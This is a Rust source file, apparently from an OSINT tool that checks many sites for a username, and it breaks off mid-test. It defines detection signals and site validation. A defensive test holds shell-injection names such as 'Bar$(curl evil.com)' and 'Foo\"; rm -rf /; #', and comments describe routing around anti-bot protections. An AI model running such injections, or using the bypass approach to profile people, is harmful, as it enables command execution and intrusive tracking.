adler_core/site.rs
1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31/// One site we can probe for the existence of an account.
32#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34 /// Human-readable site name. Doubles as the stable filter key
35 /// (case-insensitive) used by CLI `--only` / `--exclude`.
36 pub name: String,
37 /// URL template containing a `{username}` placeholder.
38 pub url: UrlTemplate,
39 /// Ordered list of detection signals. Aggregated per the type-level docs.
40 /// Optional in source JSON when [`Site::engine`] is set — the engine's
41 /// signals are inherited at load time. After
42 /// [`crate::Registry`] resolution this vec is always non-empty (or the
43 /// site fails `validate`).
44 #[serde(default, skip_serializing_if = "Vec::is_empty")]
45 pub signals: Vec<Signal>,
46 /// One or more usernames known to exist on this site. Consumed by
47 /// `adler doctor` to verify the signal list still reports `Found`
48 /// for a real account. Accepts either a single string or an array
49 /// of strings in JSON; the doctor probes each in declaration order
50 /// and passes the present-check if **any** one of them resolves to
51 /// `Found`. Listing several is defensive — brand accounts or other
52 /// users that the site special-cases (e.g. Instagram's own
53 /// `instagram` account) shouldn't false-fail the whole site.
54 #[serde(default, skip_serializing_if = "Option::is_none")]
55 pub known_present: Option<KnownPresent>,
56 /// Username known to *not* exist on this site (optional). When omitted,
57 /// the doctor generates a random nonsense username instead.
58 #[serde(default, skip_serializing_if = "Option::is_none")]
59 pub known_absent: Option<String>,
60 /// Optional CSS-selector rules for pulling profile fields (name, bio,
61 /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
62 #[serde(default, skip_serializing_if = "Vec::is_empty")]
63 pub extract: Vec<Extractor>,
64 /// Free-form classification tags for scanning a subset of the registry,
65 /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
66 /// A site with no tags is universal (included unless a `--tag` filter
67 /// excludes it). Conventionally lowercase; `axis:value` is just a naming
68 /// convention, not enforced.
69 #[serde(default, skip_serializing_if = "Vec::is_empty")]
70 pub tags: Vec<String>,
71 /// Extra HTTP headers to send with the probe (e.g.
72 /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
73 /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
74 /// backends apply them via `Network.setExtraHTTPHeaders` before
75 /// navigation; the raw-HTTP path doesn't read this yet.
76 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77 pub request_headers: std::collections::BTreeMap<String, String>,
78 /// Optional regular expression describing usernames a site will
79 /// accept. When set and the scanned username doesn't match, the
80 /// site is skipped (the outcome is reported as `Uncertain` with
81 /// reason `UsernameNotAllowed`, without issuing any HTTP request).
82 /// Saves work AND avoids the false-positive class where a site
83 /// 404s on illegal usernames in ways our signal can't tell apart
84 /// from a missing account.
85 ///
86 /// Imported from Sherlock's `regexCheck` field; 95+ sites
87 /// upstream carry one (length bounds, character classes, etc.).
88 /// Validation at load time compiles the regex with `regex::Regex`
89 /// — a malformed pattern rejects the site rather than silently
90 /// degrading at scan time.
91 #[serde(default, skip_serializing_if = "Option::is_none")]
92 pub regex_check: Option<String>,
93 /// Name of a shared [`Engine`] this site inherits from (e.g.
94 /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
95 /// thousands of instances with identical detection signatures;
96 /// defining the signature once on an engine and inheriting it
97 /// keeps the registry small and the cost of a platform-wide
98 /// HTML change one fix instead of hundreds.
99 ///
100 /// At [`crate::Registry::validate`] time, engine fields are
101 /// merged *under* the site's own — anything the site declares
102 /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
103 /// conflict; anything left empty / unset is filled from the
104 /// engine. An `engine: "X"` referring to a non-existent X is a
105 /// load-time error.
106 #[serde(default, skip_serializing_if = "Option::is_none")]
107 pub engine: Option<String>,
108 /// Characters the site silently drops from the username server-side
109 /// before matching — `john.doe` and `johndoe` resolve to the same
110 /// account on a site that lists `strip_bad_char: "."`. We pre-strip
111 /// at probe time so the URL we issue matches the canonical form
112 /// the site uses, avoiding a false `NotFound` on a benign
113 /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
114 /// name; carried verbatim through `scripts/import_whatsmyname.py`.
115 #[serde(default, skip_serializing_if = "Option::is_none")]
116 pub strip_bad_char: Option<String>,
117 /// HTTP method used to probe this site. Defaults to GET — the vast
118 /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
119 /// some Discord/Holopin endpoints) only answer to POST.
120 #[serde(default, skip_serializing_if = "is_default_method")]
121 pub request_method: HttpMethod,
122 /// Request body to send when [`Site::request_method`] is POST. The
123 /// literal `{username}` placeholder is substituted with the probe
124 /// username (same as URL templates). For GraphQL endpoints this
125 /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
126 #[serde(default, skip_serializing_if = "Option::is_none")]
127 pub request_body: Option<String>,
128 /// Specific anti-bot mechanisms the site is known to deploy. A
129 /// richer alternative to the flat `bot-protected` tag — knowing
130 /// *which* protection a site uses lets future routing pick the
131 /// right backend (`Cloudflare` → cloudscraper-style bypass,
132 /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
133 /// of the all-or-nothing `bot-protected` decision.
134 ///
135 /// Independent of [`Site::tags`]: the existing `bot-protected`
136 /// tag stays as a back-compat shorthand and routes through the
137 /// browser backend exactly as before. When this vector is
138 /// non-empty Adler also treats the site as bot-protected
139 /// regardless of the tag.
140 #[serde(default, skip_serializing_if = "Vec::is_empty")]
141 pub protection: Vec<ProtectionKind>,
142 /// Disable the site without removing it from the registry.
143 /// Disabled sites are skipped by [`crate::Registry::filter`] —
144 /// they don't get probed, don't appear in `--list-sites`, and
145 /// don't count toward the doctor's tally. Useful for parking
146 /// known-broken entries with a reason comment instead of
147 /// deleting them outright, so a future contributor can re-enable
148 /// the entry by flipping the flag once they've authored a
149 /// working signature.
150 #[serde(default, skip_serializing_if = "std::ops::Not::not")]
151 pub disabled: bool,
152 /// Canonical-source link for mirror-style sites. When a site is
153 /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
154 /// `YouTube`), `source` carries the name of the primary site this
155 /// one mirrors. Lets future UX surface "Twitter is offline,
156 /// here's the same account on Nitter" without hand-curated
157 /// linkage. Empty / `None` for canonical sites and sites with
158 /// no known mirror relationship.
159 #[serde(default, skip_serializing_if = "Option::is_none")]
160 pub source: Option<String>,
161 /// Approximate popularity rank — lower numbers are more popular.
162 /// Used by `adler --top N` to scan only the most-popular N sites
163 /// (useful for fast checks of high-signal targets). Ranks are
164 /// curated, not derived from traffic data: the seed set covers
165 /// well-known OSINT-relevant sites where most users have
166 /// accounts. Sites without a rank are skipped by `--top N`.
167 #[serde(default, skip_serializing_if = "Option::is_none")]
168 pub popularity: Option<u32>,
169}
170
171/// A specific anti-bot mechanism a site is known to deploy. Used to
172/// route probes to the right backend (raw HTTP, cloudscraper, full
173/// browser) and to inform users what blocks reliable detection.
174#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
175#[serde(rename_all = "kebab-case")]
176#[non_exhaustive]
177pub enum ProtectionKind {
178 /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
179 /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
180 /// (e.g. `FlareSolverr`) without a full browser.
181 Cloudflare,
182 /// AWS `CloudFront` edge protection. Often UA-strictness only.
183 Cloudfront,
184 /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
185 /// challenge model to Cloudflare.
186 DdosGuard,
187 /// Cloudflare's JS-challenge ("I am under attack" mode).
188 /// Needs a JS-executing backend.
189 CfJsChallenge,
190 /// Cloudflare's WAF firewall blocking by signature, requiring
191 /// a real browser fingerprint to clear.
192 CfFirewall,
193 /// JA3/JA4 TLS-fingerprint matching (servers that classify the
194 /// client by its TLS handshake shape, not its UA).
195 TlsFingerprint,
196 /// `Anubis` proof-of-work challenge. Used by codeberg + a
197 /// growing number of FOSS projects to discourage scraping.
198 Anubis,
199 /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
200 /// always blocking — `Uncertain` is the honest answer.
201 Captcha,
202 /// Trivial UA-strictness: rejects unknown User-Agent strings
203 /// but lets through a real-browser UA. Cheapest to bypass.
204 UserAgent,
205 /// Endpoint requires authentication; no anonymous probe path
206 /// exists. Practically unscrapable for OSINT.
207 UserAuth,
208}
209
210/// HTTP method used to probe a site. Only GET and POST are supported.
211#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
212#[serde(rename_all = "UPPERCASE")]
213pub enum HttpMethod {
214 /// Standard GET — the default for ~99% of sites in the registry.
215 #[default]
216 Get,
217 /// POST — for API endpoints that only differentiate accounts via a
218 /// body payload (GraphQL queries, form submissions). Pair with
219 /// [`Site::request_body`].
220 Post,
221}
222
223/// serde's `skip_serializing_if` callback contract requires a
224/// reference, so the by-value lint on a 1-byte type doesn't apply.
225#[allow(clippy::trivially_copy_pass_by_ref)]
226fn is_default_method(m: &HttpMethod) -> bool {
227 matches!(m, HttpMethod::Get)
228}
229
230/// Shared detection signature template for a family of sites that
231/// run the same forum / blog / wiki software (Discourse, vBulletin,
232/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
233///
234/// Engines carry the same kinds of fields as a [`Site`] does (just
235/// the inheritable ones — there's no per-engine `url`, that comes
236/// from the site itself). At registry load, the engine's fields
237/// are merged *under* each referring site's own fields: site wins
238/// on conflict.
239#[derive(Debug, Clone, Default, Serialize, Deserialize)]
240#[non_exhaustive]
241pub struct Engine {
242 /// Default detection signals for sites of this family.
243 /// Inherited only when the site itself declares no `signals`.
244 #[serde(default, skip_serializing_if = "Vec::is_empty")]
245 pub signals: Vec<Signal>,
246 /// Default extra HTTP headers (e.g. a User-Agent that the
247 /// platform accepts where the browser default gets blocked).
248 /// Merged with the site's own headers; site wins per-key.
249 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
250 pub request_headers: std::collections::BTreeMap<String, String>,
251 /// Default username-validity regex inherited only when the site
252 /// itself doesn't declare one.
253 #[serde(default, skip_serializing_if = "Option::is_none")]
254 pub regex_check: Option<String>,
255}
256
257impl Engine {
258 /// Compile-check the engine's own constraints — the inheritable
259 /// fields are subject to the same validation as a site's would
260 /// be.
261 ///
262 /// # Errors
263 /// Returns [`Error::InvalidSite`] when the engine name is
264 /// empty, a signal carries an empty marker, or any other
265 /// constraint a [`Site::validate`] would also flag.
266 pub fn validate(&self, name: &str) -> Result<()> {
267 if name.trim().is_empty() {
268 return Err(Error::InvalidSite {
269 reason: "engine name is empty".into(),
270 });
271 }
272 for signal in &self.signals {
273 signal.validate().map_err(|reason| Error::InvalidSite {
274 reason: format!("engine {name:?}: {reason}"),
275 })?;
276 }
277 if let Some(pat) = &self.regex_check {
278 if let Err(err) = regex::Regex::new(pat) {
279 tracing::warn!(
280 engine = %name, pattern = %pat, error = %err,
281 "engine regex_check did not compile; gate disabled for inheriting sites",
282 );
283 }
284 }
285 Ok(())
286 }
287
288 /// Fill the inheritable empty / unset fields of `site` from
289 /// this engine. Site fields are authoritative: if the site has
290 /// any signals at all, no engine signals are merged in.
291 /// `request_headers` merge per-key (site wins on per-key
292 /// conflict).
293 pub fn merge_into(&self, site: &mut Site) {
294 if site.signals.is_empty() {
295 site.signals.clone_from(&self.signals);
296 }
297 for (k, v) in &self.request_headers {
298 site.request_headers
299 .entry(k.clone())
300 .or_insert_with(|| v.clone());
301 }
302 if site.regex_check.is_none() {
303 site.regex_check.clone_from(&self.regex_check);
304 }
305 }
306}
307
308/// Known-present declaration on a [`Site`].
309///
310/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
311/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
312/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
313/// the site was authored with, so single-username entries stay
314/// compact.
315#[derive(Debug, Clone, Serialize, Deserialize)]
316#[serde(untagged)]
317#[non_exhaustive]
318pub enum KnownPresent {
319 /// Exactly one candidate username.
320 Single(String),
321 /// Two or more candidate usernames. Doctor passes if any resolve
322 /// to `Found`.
323 Multiple(Vec<String>),
324}
325
326impl KnownPresent {
327 /// View all candidate usernames as a slice, in declaration order.
328 /// Always non-empty for `Single`; may be empty for a hand-authored
329 /// `Multiple([])` (validation rejects that).
330 pub fn as_slice(&self) -> &[String] {
331 match self {
332 Self::Single(s) => std::slice::from_ref(s),
333 Self::Multiple(v) => v.as_slice(),
334 }
335 }
336
337 /// Primary candidate — the first declared username. `Single`
338 /// always has one; `Multiple` may be empty if a contributor wrote
339 /// `[]` (caught by [`Site::validate`]).
340 pub fn primary(&self) -> Option<&str> {
341 self.as_slice().first().map(String::as_str)
342 }
343}
344
345impl From<&str> for KnownPresent {
346 fn from(s: &str) -> Self {
347 Self::Single(s.to_owned())
348 }
349}
350
351impl From<String> for KnownPresent {
352 fn from(s: String) -> Self {
353 Self::Single(s)
354 }
355}
356
357/// Upper bound on a site name's length. Names appear in CLI output,
358/// CSV columns, and the validate-sites.yml workflow's run-summary
359/// table — keeping them short avoids both UI breakage and
360/// pathological CI artefacts.
361const NAME_MAX_LEN: usize = 80;
362
363/// True when `name` consists only of characters safe to interpolate
364/// into shell, CSV, and CLI argument contexts. Matches the JSON
365/// Schema pattern `^[\w][\w .()!/+-]*$`.
366fn is_safe_site_name(name: &str) -> bool {
367 let mut chars = name.chars();
368 match chars.next() {
369 Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
370 _ => return false,
371 }
372 chars.all(|c| {
373 c.is_ascii_alphanumeric()
374 || c == '_'
375 || c == ' '
376 || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
377 })
378}
379
380/// A rule for extracting one profile field from a page.
381#[derive(Debug, Clone, Serialize, Deserialize)]
382pub struct Extractor {
383 /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
384 pub field: String,
385 /// CSS selector locating the element.
386 pub selector: String,
387 /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
388 /// element's trimmed text content is used.
389 #[serde(default, skip_serializing_if = "Option::is_none")]
390 pub attr: Option<String>,
391}
392
393impl Site {
394 /// Render the site URL for a given username.
395 ///
396 /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
397 /// those characters are removed from `username` before
398 /// substitution — so a `john.doe` probe against a site that
399 /// lists `strip_bad_char: "."` actually hits the URL for
400 /// `johndoe`, matching the canonical form the site stores
401 /// internally.
402 pub fn url_for(&self, username: &Username) -> String {
403 let raw = username.as_str();
404 match self.strip_bad_char.as_deref() {
405 Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
406 let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
407 self.url.substitute(&stripped)
408 }
409 _ => self.url.substitute(raw),
410 }
411 }
412
413 /// Validate semantic invariants the type system can't enforce
414 /// (empty signals list, empty markers, empty status code sets).
415 pub fn validate(&self) -> Result<()> {
416 if self.name.trim().is_empty() {
417 return Err(Error::InvalidSite {
418 reason: "site name is empty".into(),
419 });
420 }
421 // Site names doubled as shell-interpolation values in the
422 // `validate-sites.yml` PR gate; an unsanitised name like
423 // `Foo"; rm -rf /; #` would have broken out of `"$name"`
424 // quoting and run arbitrary commands on the runner. Both the
425 // JSON Schema and this Rust loader enforce a safe character
426 // class (word chars plus a few visual punctuation marks) at
427 // every entry point.
428 if self.name.len() > NAME_MAX_LEN {
429 return Err(Error::InvalidSite {
430 reason: format!(
431 "site name longer than {NAME_MAX_LEN} chars: {:?}",
432 self.name
433 ),
434 });
435 }
436 if !is_safe_site_name(&self.name) {
437 return Err(Error::InvalidSite {
438 reason: format!(
439 "site name {:?} contains characters outside the allowed \
440 set (word chars, space, `.()!/+-`)",
441 self.name
442 ),
443 });
444 }
445 if self.signals.is_empty() {
446 return Err(Error::InvalidSite {
447 reason: format!("site {:?}: signals list is empty", self.name),
448 });
449 }
450 for signal in &self.signals {
451 signal.validate().map_err(|reason| Error::InvalidSite {
452 reason: format!("site {:?}: {reason}", self.name),
453 })?;
454 }
455 for extractor in &self.extract {
456 if extractor.field.trim().is_empty() {
457 return Err(Error::InvalidSite {
458 reason: format!("site {:?}: extractor has an empty field name", self.name),
459 });
460 }
461 if scraper::Selector::parse(&extractor.selector).is_err() {
462 return Err(Error::InvalidSite {
463 reason: format!(
464 "site {:?}: invalid CSS selector {:?} for field {:?}",
465 self.name, extractor.selector, extractor.field
466 ),
467 });
468 }
469 }
470 if let Some(pat) = &self.regex_check {
471 if let Err(err) = regex::Regex::new(pat) {
472 // Sherlock's regexes occasionally use lookarounds
473 // (e.g. `(?![.-])`), which the Rust `regex` crate
474 // doesn't support — it's a true regular-language
475 // engine for performance + DoS safety. Rather than
476 // reject the whole site over a username-gate the
477 // probe path will simply skip, downgrade to a warn
478 // and let the site keep working at the cost of one
479 // wasted probe per illegal username.
480 tracing::warn!(
481 site = %self.name, pattern = %pat, error = %err,
482 "regex_check did not compile; username-gate disabled for this site",
483 );
484 }
485 }
486 if let Some(kp) = &self.known_present {
487 if kp.as_slice().is_empty() {
488 return Err(Error::InvalidSite {
489 reason: format!("site {:?}: known_present is an empty list", self.name),
490 });
491 }
492 for name in kp.as_slice() {
493 if name.trim().is_empty() {
494 return Err(Error::InvalidSite {
495 reason: format!(
496 "site {:?}: known_present contains an empty username",
497 self.name
498 ),
499 });
500 }
501 }
502 }
503 for tag in &self.tags {
504 if tag.trim().is_empty() {
505 return Err(Error::InvalidSite {
506 reason: format!("site {:?}: tag is empty", self.name),
507 });
508 }
509 }
510 Ok(())
511 }
512}
513
514/// URL template containing a `{username}` placeholder.
515///
516/// Validated at construction: must contain the placeholder and start with
517/// `http://` or `https://`.
518#[derive(Debug, Clone, PartialEq, Eq)]
519pub struct UrlTemplate(String);
520
521const PLACEHOLDER: &str = "{username}";
522
523impl UrlTemplate {
524 /// Build a template, validating placeholder and scheme.
525 pub fn new(template: impl Into<String>) -> Result<Self> {
526 let t = template.into();
527 if !t.contains(PLACEHOLDER) {
528 return Err(Error::InvalidSite {
529 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
530 });
531 }
532 if !(t.starts_with("http://") || t.starts_with("https://")) {
533 return Err(Error::InvalidSite {
534 reason: format!("url template must start with http(s)://: {t:?}"),
535 });
536 }
537 Ok(Self(t))
538 }
539
540 fn substitute(&self, username: &str) -> String {
541 self.0.replace(PLACEHOLDER, username)
542 }
543
544 /// Borrow the raw template (with placeholder).
545 pub fn as_str(&self) -> &str {
546 &self.0
547 }
548}
549
550impl fmt::Display for UrlTemplate {
551 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
552 f.write_str(&self.0)
553 }
554}
555
556impl Serialize for UrlTemplate {
557 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
558 self.0.serialize(s)
559 }
560}
561
562impl<'de> Deserialize<'de> for UrlTemplate {
563 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
564 let raw = String::deserialize(d)?;
565 Self::new(raw).map_err(serde::de::Error::custom)
566 }
567}
568
569/// A single piece of evidence about whether an account exists.
570///
571/// Signals are tagged in JSON by their `kind`. New variants will land for
572/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
573/// adding variants is not a breaking change.
574#[derive(Debug, Clone, Serialize, Deserialize)]
575#[serde(tag = "kind", rename_all = "snake_case")]
576#[non_exhaustive]
577pub enum Signal {
578 /// Votes **`Found`** when the response status is in `codes`.
579 StatusFound {
580 /// Status codes that vote for existence. Must be non-empty.
581 codes: Vec<u16>,
582 },
583 /// Votes **`NotFound`** when the response status is in `codes`.
584 StatusNotFound {
585 /// Status codes that vote for non-existence. Must be non-empty.
586 codes: Vec<u16>,
587 },
588 /// Votes **`Found`** when the response body contains `text`.
589 BodyPresent {
590 /// Substring whose appearance votes for existence. Must be non-empty.
591 text: String,
592 },
593 /// Votes **`NotFound`** when the response body contains `text`.
594 BodyAbsent {
595 /// Substring whose appearance votes for non-existence (e.g.
596 /// `"Profile not found"`). Must be non-empty.
597 text: String,
598 },
599 /// Votes **`NotFound`** when the final URL (post-redirect) contains
600 /// `fragment`.
601 RedirectAbsent {
602 /// Substring that, when present in the final URL, indicates the
603 /// account is missing (typically `"/login"` or `"/404"`). Must be
604 /// non-empty.
605 fragment: String,
606 },
607}
608
609/// Probe data extracted from an HTTP response, fed to each [`Signal`].
610///
611/// Internal detection plumbing — not part of the public API.
612#[derive(Debug)]
613pub(crate) struct Probe<'a> {
614 /// HTTP status code.
615 pub(crate) status: u16,
616 /// Final URL after redirects.
617 pub(crate) final_url: &'a str,
618 /// Decoded response body. Empty string when no body-using signal is configured.
619 pub(crate) body: &'a str,
620}
621
622/// What one signal concluded after looking at a probe.
623#[derive(Debug, Clone, Copy, PartialEq, Eq)]
624pub(crate) enum SignalVerdict {
625 /// This signal votes that the account exists.
626 Found,
627 /// This signal votes that the account does not exist.
628 NotFound,
629 /// This signal had nothing to say (its trigger condition didn't match).
630 Ambiguous,
631}
632
633impl Signal {
634 /// True if this signal needs to inspect the response body. Used by the
635 /// client to skip body reads when no signal requires them.
636 pub(crate) fn needs_body(&self) -> bool {
637 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
638 }
639
640 /// Evaluate this signal against a probe and produce a vote.
641 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
642 match self {
643 Self::StatusFound { codes } => {
644 if codes.contains(&probe.status) {
645 SignalVerdict::Found
646 } else {
647 SignalVerdict::Ambiguous
648 }
649 }
650 Self::StatusNotFound { codes } => {
651 if codes.contains(&probe.status) {
652 SignalVerdict::NotFound
653 } else {
654 SignalVerdict::Ambiguous
655 }
656 }
657 Self::BodyPresent { text } => {
658 if probe.body.contains(text.as_str()) {
659 SignalVerdict::Found
660 } else {
661 SignalVerdict::Ambiguous
662 }
663 }
664 Self::BodyAbsent { text } => {
665 if probe.body.contains(text.as_str()) {
666 SignalVerdict::NotFound
667 } else {
668 SignalVerdict::Ambiguous
669 }
670 }
671 Self::RedirectAbsent { fragment } => {
672 if probe.final_url.contains(fragment.as_str()) {
673 SignalVerdict::NotFound
674 } else {
675 SignalVerdict::Ambiguous
676 }
677 }
678 }
679 }
680
681 /// Human-readable description of why this signal fired against `probe`,
682 /// for verdict explainability. Only meaningful for a signal that voted
683 /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
684 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
685 match self {
686 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
687 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
688 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
689 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
690 Self::RedirectAbsent { fragment } => {
691 format!("final URL contains {fragment:?} (redirect_absent)")
692 }
693 }
694 }
695
696 fn validate(&self) -> std::result::Result<(), String> {
697 match self {
698 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
699 if codes.is_empty() {
700 return Err("status signal codes list is empty".into());
701 }
702 }
703 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
704 if text.is_empty() {
705 return Err("body signal text is empty".into());
706 }
707 }
708 Self::RedirectAbsent { fragment } => {
709 if fragment.is_empty() {
710 return Err("redirect signal fragment is empty".into());
711 }
712 }
713 }
714 Ok(())
715 }
716}
717
718/// Aggregate per-signal verdicts into a final [`MatchKind`].
719///
720/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
721/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
722/// docs for why a `NotFound` vote outranks a `Found` vote.
723pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
724where
725 I: IntoIterator<Item = SignalVerdict>,
726{
727 let mut found = false;
728 let mut not_found = false;
729 for v in verdicts {
730 match v {
731 SignalVerdict::Found => found = true,
732 SignalVerdict::NotFound => not_found = true,
733 SignalVerdict::Ambiguous => {}
734 }
735 }
736 if not_found {
737 MatchKind::NotFound
738 } else if found {
739 MatchKind::Found
740 } else {
741 MatchKind::Uncertain
742 }
743}
744
745#[cfg(test)]
746mod tests {
747 use super::*;
748
749 fn site_with(signals: Vec<Signal>) -> Site {
750 Site {
751 name: "Example".into(),
752 url: UrlTemplate::new("https://example.com/{username}").unwrap(),
753 signals,
754 known_present: None,
755 known_absent: None,
756 extract: Vec::new(),
757 tags: Vec::new(),
758 request_headers: std::collections::BTreeMap::new(),
759 regex_check: None,
760 engine: None,
761 strip_bad_char: None,
762 request_method: crate::site::HttpMethod::Get,
763 request_body: None,
764 protection: Vec::new(),
765 disabled: false,
766 source: None,
767 popularity: None,
768 }
769 }
770
771 #[test]
772 fn url_template_substitutes_placeholder() {
773 let user = Username::new("alice").unwrap();
774 let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
775 assert_eq!(site.url_for(&user), "https://example.com/alice");
776 }
777
778 #[test]
779 fn url_for_strips_bad_chars_before_substitution() {
780 let user = Username::new("john.doe").unwrap();
781 let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
782 site.strip_bad_char = Some(".".into());
783 assert_eq!(site.url_for(&user), "https://example.com/johndoe");
784 }
785
786 #[test]
787 fn url_for_strip_bad_char_noop_when_no_match() {
788 let user = Username::new("alice").unwrap();
789 let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
790 site.strip_bad_char = Some(".".into());
791 assert_eq!(site.url_for(&user), "https://example.com/alice");
792 }
793
794 #[test]
795 fn url_template_rejects_missing_placeholder() {
796 assert!(UrlTemplate::new("https://example.com/users/").is_err());
797 }
798
799 #[test]
800 fn url_template_rejects_bad_scheme() {
801 assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
802 }
803
804 #[test]
805 fn validate_requires_non_empty_signals() {
806 let err = site_with(vec![]).validate().unwrap_err();
807 assert!(err.to_string().contains("signals list is empty"));
808 }
809
810 #[test]
811 fn validate_rejects_empty_status_codes() {
812 let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
813 .validate()
814 .unwrap_err();
815 assert!(err.to_string().contains("status signal"));
816 }
817
818 #[test]
819 fn validate_rejects_empty_body_text() {
820 let err = site_with(vec![Signal::BodyAbsent {
821 text: String::new(),
822 }])
823 .validate()
824 .unwrap_err();
825 assert!(err.to_string().contains("body signal"));
826 }
827
828 #[test]
829 fn validate_rejects_empty_redirect_fragment() {
830 let err = site_with(vec![Signal::RedirectAbsent {
831 fragment: String::new(),
832 }])
833 .validate()
834 .unwrap_err();
835 assert!(err.to_string().contains("redirect signal"));
836 }
837
838 #[test]
839 fn validate_rejects_shell_metacharacters_in_name() {
840 // The validate-sites.yml workflow used to inject `--only "$name"`
841 // where `$name` came from PR-controlled sites.json. A name like
842 // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
843 // and executed on the runner. Schema + this loader both enforce
844 // a safe character class; verify a representative selection of
845 // dangerous chars is rejected.
846 for bad in [
847 "Foo\"; rm -rf /; #",
848 "Bar$(curl evil.com)",
849 "Baz`whoami`",
850 "Qux\\nfoo",
851 "back\\slash",
852 "pipe|ish",
853 "semi;colon",
854 "amp&and",
855 "lt<gt>",
856 ] {
857 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
858 s.name = bad.into();
859 let err = s.validate().unwrap_err();
860 assert!(
861 err.to_string()
862 .contains("characters outside the allowed set"),
863 "expected unsafe-name rejection for {bad:?}, got {err}",
864 );
865 }
866 }
867
868 #[test]
869 fn validate_accepts_real_world_site_names() {
870 // Cross-check the validation against names we actually ship.
871 for ok in [
872 "GitHub",
873 "Steam Community (User)",
874 "X / Twitter",
875 "osu!",
876 "Eintracht Frankfurt Forum",
877 "Archive of Our Own",
878 "Career.habr",
879 "fl",
880 "GitLab.com",
881 "Sbazar.cz",
882 ] {
883 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
884 s.name = ok.into();
885 assert!(s.validate().is_ok(), "expected {ok:?} to validate");
886 }
887 }
888
889 #[test]
890 fn validate_rejects_overlong_name() {
891 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
892 s.name = "A".repeat(100);
893 let err = s.validate().unwrap_err();
894 assert!(err.to_string().contains("longer than"));
895 }
896
897 #[test]
898 fn validate_accepts_well_formed_regex_check() {
899 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
900 s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
901 assert!(s.validate().is_ok());
902 }
903
904 #[test]
905 fn validate_tolerates_unsupported_regex_features() {
906 // Sherlock-imported regexes occasionally use lookarounds
907 // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
908 // those sites should still load, with the username-gate
909 // silently disabled rather than rejecting the whole site.
